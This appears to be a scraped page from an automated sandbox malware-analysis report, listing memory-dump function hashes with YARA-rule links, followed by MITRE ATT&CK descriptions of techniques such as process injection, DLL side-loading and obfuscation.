Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1924b377d18162335a344a2219496a790f2dcf95a484969c85faaeda8ed9c07c
Instruction ID: 8deb5b79917ca1940ceea7f296abe0b95e89d323a47f07690d5a423b63877bc7
Opcode Fuzzy Hash: 1924b377d18162335a344a2219496a790f2dcf95a484969c85faaeda8ed9c07c
Instruction Fuzzy Hash: 0C41E53084E3C98FF7879B3498055F63FA0EB43364F0841FBD089CA0A3D6A9551AC792

Function 00007FFAACC8A877 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c75c7736dc3d987bf0dd0c0eeacda277afae6a0eb5f06dda4a9c03f850872f83
Instruction ID: 0e16f73700c384b317e68a507c5d310e08b1e2f9e01bc6baaf3f1a4ec32c4b65
Opcode Fuzzy Hash: c75c7736dc3d987bf0dd0c0eeacda277afae6a0eb5f06dda4a9c03f850872f83
Instruction Fuzzy Hash: 07415E3160CA08CFEF88FF28D459DA5B7E1FB693147084169D44EC3692CE25ED49CB81

Function 00007FFAACC8A921 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9da871e448117283988f7397ee6879773b1760f8186c719e7a17ac20d2f7456
Instruction ID: 53a8857157922e0c9503a518ac379183f5d6536efbfc01172d8a1f715e5ebae6
Opcode Fuzzy Hash: b9da871e448117283988f7397ee6879773b1760f8186c719e7a17ac20d2f7456
Instruction Fuzzy Hash: C2315D3160CA48CFDF88EF28D459DA5B7E1FB6931470842A9D44EC76A3CE24ED49CB91

Function 00007FFAACC8A8BB Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e582e60ddeba4bae8298cd2ff3425bcfd4b99d52993c02ff6c519a47eb6193
Instruction ID: 489edfdd388e053ac0841163cf71efe55540f8bbf691886c307d767c41dd97db
Opcode Fuzzy Hash: 05e582e60ddeba4bae8298cd2ff3425bcfd4b99d52993c02ff6c519a47eb6193
Instruction Fuzzy Hash: A2314C3160CA49CFDF88EF28D059DA5B7E1FB693107044169D44EC76A3CE24E949CB81

Function 00007FFAACC9596D Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4604249dfa1a42054bcad9b107e3f2736a1417d7efb3d74887e6f5b1757d84d
Instruction ID: 6107f5731f4cf706d4ac3e7581d32ae2ca1cbd27e3ce7d50f427859bbb19daea
Opcode Fuzzy Hash: d4604249dfa1a42054bcad9b107e3f2736a1417d7efb3d74887e6f5b1757d84d
Instruction Fuzzy Hash: 2C310E3160CA588FDF88FF28C495EA5B7E1FB69314714466AD00EC76A2DF25EC45CB81

Function 00007FFAACC85C5A Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72c9aded5f93c5ba9dad99ae59592e27b953e8f82a1cef53313a25d26a321a21
Instruction ID: 9ec0e55d76123d7c123776a6498c8605b1f1d34f68de6e21630402eb3506c656
Opcode Fuzzy Hash: 72c9aded5f93c5ba9dad99ae59592e27b953e8f82a1cef53313a25d26a321a21
Instruction Fuzzy Hash: 0A31C62094F3C58FF7839B3498585FA3FA16F43364F1940FAD089CA4A3D6D95619C792

Function 00007FFAACC870F5 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79354f883546f96e2164c80160c6ebd898878af6b27399af80aa1d0a2950b35f
Instruction ID: 4209a5e465dc8d014322290aea18bb3aeea57c1f5a36b58a2d8c60ef8a243faa
Opcode Fuzzy Hash: 79354f883546f96e2164c80160c6ebd898878af6b27399af80aa1d0a2950b35f
Instruction Fuzzy Hash: 23318C71D1DA9DCFEB85DF54C8605BDBBB1FF4A300F4440BAE00ED7692DA24A9098B91

Function 00007FFAACC8D0D5 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9c50123d50eeb21f90fd6a5ea5b1e85f23cbab2a77a43e43d6f19e0e56b7fe0
Instruction ID: 47b88bcba8f91a5b38c3f251559437f4c321eaff68d9c2395b4fca4412b560ff
Opcode Fuzzy Hash: f9c50123d50eeb21f90fd6a5ea5b1e85f23cbab2a77a43e43d6f19e0e56b7fe0
Instruction Fuzzy Hash: 98217131919A4E8FFBD49B5884153FE77E1EF59310F004076D00EEB291DE29AA098791

Function 00007FFAACC895E1 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8eddb57861e5d3f6579b107779bb4502d0e4fd2bc31896b1f779d4d4bb209ab
Instruction ID: 1f8a42701176e9b41adf158c5033252b9f96a76a7afa822d9a34d9bb8618a39c
Opcode Fuzzy Hash: c8eddb57861e5d3f6579b107779bb4502d0e4fd2bc31896b1f779d4d4bb209ab
Instruction Fuzzy Hash: 8E31271091E5D7CAF7EA8B1848655B67B51EF53305719CABAE08F8B0DBC81CEA4983C1

Function 00007FFAACC8B64B Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 615d661cb677e5fbb21037b632aa6e645eee24d47e3db15a257a3311a2ac27cb
Instruction ID: 36699e45712bcd78412026aa9d7510f1efa04650ff6d9a54ea84aba379c60537
Opcode Fuzzy Hash: 615d661cb677e5fbb21037b632aa6e645eee24d47e3db15a257a3311a2ac27cb
Instruction Fuzzy Hash: 43215E70919A4DCFEB98DF58C8605BEBBB1FF49300F14407AD00EE7292DA24E9098791

Function 00007FFAACC8A6F5 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee5fd1ff225c067ba88c735eae5528d1a7f5b60f61851874adc44c9fa23b286c
Instruction ID: 66d28201a57314cb5d21ac38f603ba7c882492dfffab9a8492fa7926e20851c7
Opcode Fuzzy Hash: ee5fd1ff225c067ba88c735eae5528d1a7f5b60f61851874adc44c9fa23b286c
Instruction Fuzzy Hash: 7431183190A94ACFEF98DF548445ABF77B0FF46700F51807AD40EE3191DA39AA48A7C1

Function 00007FFAACC8ED80 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a363f95b9499dbaf5bcc9ad4ab05b5ad79eaa6bd69adb9753ba7d583fdeb1cc
Instruction ID: dd2f243c7b2723fc112191a5c274713ab8bda6ee7c90e46d724fb3c46f9f3ea3
Opcode Fuzzy Hash: 0a363f95b9499dbaf5bcc9ad4ab05b5ad79eaa6bd69adb9753ba7d583fdeb1cc
Instruction Fuzzy Hash: CE31581091D0968BF79A9B1484645757B60EF93301B18C6FAC0AE8B497C52CED89C791

Function 00007FFAACC871D1 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c32e5a36820a1b11c9a5f242299ffd20ed3d114985fa24faef72928c740f1af
Instruction ID: ed1874a7391e764be8a92bfc24fba77ee730e339bc0b580474848683679f1222
Opcode Fuzzy Hash: 4c32e5a36820a1b11c9a5f242299ffd20ed3d114985fa24faef72928c740f1af
Instruction Fuzzy Hash: 0011D352D0F2A3C7F2E55B6858115BB5A506F47350B1481BAF44F861C3EC0CAA5D13E2

Function 00007FFAACC88690 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac34cf970755cc776bdc3c5e27cc8e478db664bf06d86c4c7962833cd494a92e
Instruction ID: af86e5f5722a18135c7b12f8639e54fdb562651e7c2baaf2c984fd4d2ee2f9f1
Opcode Fuzzy Hash: ac34cf970755cc776bdc3c5e27cc8e478db664bf06d86c4c7962833cd494a92e
Instruction Fuzzy Hash: B711C13191A9098BEB94AF34D4019F6B3E0EF55351B00853AE04FC7992CE28FA498791

Function 00007FFAACC8DE30 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea8c43e61639a8a63e5978f00e43a58cedd430f6cc830d3ace6315e2b6eca441
Instruction ID: 12a8d145208ba033993aefb35cd6e0c347fd0f339976e6af6da826737f719033
Opcode Fuzzy Hash: ea8c43e61639a8a63e5978f00e43a58cedd430f6cc830d3ace6315e2b6eca441
Instruction Fuzzy Hash: 7411A73191990A8FEBA4EF35D4019FA73D0EF55351B40857AD04FC7592CE28F60987A1

Function 00007FFAACC8D305 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77599db416cf47b3445d09e3d6077cdcd95a377f9568bc68cb9e43289cdaf1d0
Instruction ID: edca6ec16f1bc400cfb1df6c1ce3ec3b1f26850680c5e99699a0590576e18639
Opcode Fuzzy Hash: 77599db416cf47b3445d09e3d6077cdcd95a377f9568bc68cb9e43289cdaf1d0
Instruction Fuzzy Hash: D811C87190EA498FEB58EB6894556F9B7F0EF4A311F0440BED04EC7582CA28A8058795

Function 00007FFAACC8D149 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c239afe7ca35c2bae88117d24fd41a5fa428b8093b77e61d1ce3e31a16238d0b
Instruction ID: b9fed0fe05ad46b2b7a7d4a2425bdaba8419a66c6b6ec01d6ff839100892ed15
Opcode Fuzzy Hash: c239afe7ca35c2bae88117d24fd41a5fa428b8093b77e61d1ce3e31a16238d0b
Instruction Fuzzy Hash: 6101C83290FA8A9FF3E4DB6488187B67AE5DF56350F044077D00DEB291CD68A94983A1

Function 00007FFAACC8850E Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebd196bcecf39d5fe0d6c6ead17bd1c2d1b063c4ac03416ab2d118c2153e4988
Instruction ID: 9c2c3b3a74c2b843385418a91882c9630c4034e6af06dbeda904004ee44b5b18
Opcode Fuzzy Hash: ebd196bcecf39d5fe0d6c6ead17bd1c2d1b063c4ac03416ab2d118c2153e4988
Instruction Fuzzy Hash: 6911263220A50A8FF7559F28E4156F673D0EF56361F00813AE81EC7AD1CF39EA548791

Function 00007FFAACC819C0 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05f19c03d813e140eebec9de41586387155f347d47245975066c05229da2bbb5
Instruction ID: 634aadccbfea8feae44d5721ff77118cbe4f8043c0286fee964e7988e3c32911
Opcode Fuzzy Hash: 05f19c03d813e140eebec9de41586387155f347d47245975066c05229da2bbb5
Instruction Fuzzy Hash: A0012631E0AA5DCBF7A58B2844082BF2AD1DF47340F01417AF00EE7291ED68AE4D43D1

Function 00007FFAACC8DCAE Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27cd3d7254794f6fd0fbc28606d8f268ab62b59829de6765c473f977a3a0ffa9
Instruction ID: b7d882594906d051d4fa60d704398b2f725ed739f3729b01163138cfb4ba8d2f
Opcode Fuzzy Hash: 27cd3d7254794f6fd0fbc28606d8f268ab62b59829de6765c473f977a3a0ffa9
Instruction Fuzzy Hash: 6811443220A50B8FFB549F28D4057F673D0EF66321F00813BE80ECB681CF68A95487A1

Function 00007FFAACC860BF Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22341d752da98abab11c8f5fadd36ca739e8f696435e3aaf627fb6bff180069b
Instruction ID: 7f0a14f6624a65b07e456468032525f716134017210f61714b39b244b2690cf8
Opcode Fuzzy Hash: 22341d752da98abab11c8f5fadd36ca739e8f696435e3aaf627fb6bff180069b
Instruction Fuzzy Hash: D8F0C831B0CA088FEB98EB38D40A6B977D1EF89221F00457FE48EC3663CE3598424741

Function 00007FFAACC851DD Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b97731c42a0a1597e8d3ba753115e2ad94d8b6ba562b82c85c06e6f0a8fac764
Instruction ID: 75506c0ce0b82355472336df0ec9afc2b1b781f46293d93ec27dbecc9178d046
Opcode Fuzzy Hash: b97731c42a0a1597e8d3ba753115e2ad94d8b6ba562b82c85c06e6f0a8fac764
Instruction Fuzzy Hash: 0C01F751C0EA86CBFAE8AF2490155B66B91EF46300B0881BAD00FC25D2ED4CEA4843C1

Function 00007FFAACC8C0A9 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 619380717b354723964036ac0b8c41232554f6f03d21b59e39438b96ec9d1b8b
Instruction ID: 90bfa867a1dfaa21d52cb74a281e3dd4c368efa9658819c063e00b5e2d26b2c3
Opcode Fuzzy Hash: 619380717b354723964036ac0b8c41232554f6f03d21b59e39438b96ec9d1b8b
Instruction Fuzzy Hash: 5B011B7190895D8FDB88EF58C454ABCB7B1FB68300F04407EC00ED7691CA749980CF41

Function 00007FFAACC8C4B2 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 938fa70c1c9183399f93fca77224ebcff9bb8c7617b75c0ba220fb74e3f38cf3
Instruction ID: f3c7d396309be1bd2ad09b023dc9973cec7d19ef79045720c6cc1f549d1f03b4
Opcode Fuzzy Hash: 938fa70c1c9183399f93fca77224ebcff9bb8c7617b75c0ba220fb74e3f38cf3
Instruction Fuzzy Hash: 69F0623244E2C59FE3569F7088154F67FA4EF43214F1880E6D44D8B0A2C56D564AC791

Function 00007FFAACC874A3 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d22a8e422b156d5809998a2f26626c4b4fdbf4edca1dfab634183af3fc6a9455
Instruction ID: e377977eedb8f3761bbb03ccb3c5dbc838c98b922695cf469ebd42ead3dad131
Opcode Fuzzy Hash: d22a8e422b156d5809998a2f26626c4b4fdbf4edca1dfab634183af3fc6a9455
Instruction Fuzzy Hash: 5A01FA7091992C8FDFA8DF08C894BA9B7B1FB69301F1041DA800EE3690DB31AA84CF41

Function 00007FFAACC85245 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ba30b575e092e8ba3a889d39b76ee65c080a9d81c04afd18675960cbc7cbadc
Instruction ID: aec5ff40f390195f775cb2c2cf661ec3c0233912fa7ba0e06ab78a6e9eb5b6c2
Opcode Fuzzy Hash: 5ba30b575e092e8ba3a889d39b76ee65c080a9d81c04afd18675960cbc7cbadc
Instruction Fuzzy Hash: 82E09A3580E388CFFBA1DF1088560FE7B60BF52300F1842E6D50D06082DE68A71C93C2

Function 00007FFAACC884EB Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3337fcae80d6df5a85af12ddc4cc5443d92bf4b6482dcc50cb92599892534a09
Instruction ID: 94359c37d46edd507e7104262420a5e2a0482918f5836acdc447c7b0f4d37312
Opcode Fuzzy Hash: 3337fcae80d6df5a85af12ddc4cc5443d92bf4b6482dcc50cb92599892534a09
Instruction Fuzzy Hash: 35D09515A0E547C5FAF94F09802063B22E0AF42304E64803EE0AF41DC68A2DFB09A392

Function 00007FFAACC8DC8B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2807417854.00007FFAACC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffaacc80000_mOBsSQwwQhAobhYfNDABCsnt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61a40d3cf6e15dab64fccae4e4d47597c5b5d6015f0e832f2ad277dff738981f
Instruction ID: 0e9c1206526ba9cc77f393f2838610c211c362e937aeedcae8ce0ffbaeee8bad
Opcode Fuzzy Hash: 61a40d3cf6e15dab64fccae4e4d47597c5b5d6015f0e832f2ad277dff738981f
Instruction Fuzzy Hash: DAD09250E0F603C5F2E86F01816033F52D05F13741E20C4BAC05F598C5C968F7096391

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

